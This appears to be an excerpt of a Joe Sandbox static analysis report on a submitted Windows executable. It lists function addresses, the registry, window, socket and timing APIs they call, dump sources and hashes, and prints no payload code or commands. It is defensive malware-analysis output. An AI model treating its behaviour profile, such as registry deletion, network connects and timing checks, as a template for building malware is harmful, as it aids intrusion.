                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                    • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                    Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2095303065-0
                                                                                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                    Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 861336768-0
                                                                                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                    Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32 ref: 00449598
                                                                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                    • _wcslen.LIBCMT ref: 0044960D
                                                                                                                    • _wcslen.LIBCMT ref: 0044961A
                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1856069659-0
                                                                                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                    Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                    • TrackPopupMenuEx.USER32(030763C0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1300944170-0
                                                                                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                    Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1822080540-0
                                                                                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                    Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 659298297-0
                                                                                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                    Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03071B28,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03071B28,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 142311417-0
                                                                                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                    Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                    Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                    • _wcslen.LIBCMT ref: 004458FB
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3087257052-0
                                                                                                                    • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                    • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                    Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 245547762-0
                                                                                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                    Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2338827641-0
                                                                                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                    Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2875609808-0
                                                                                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
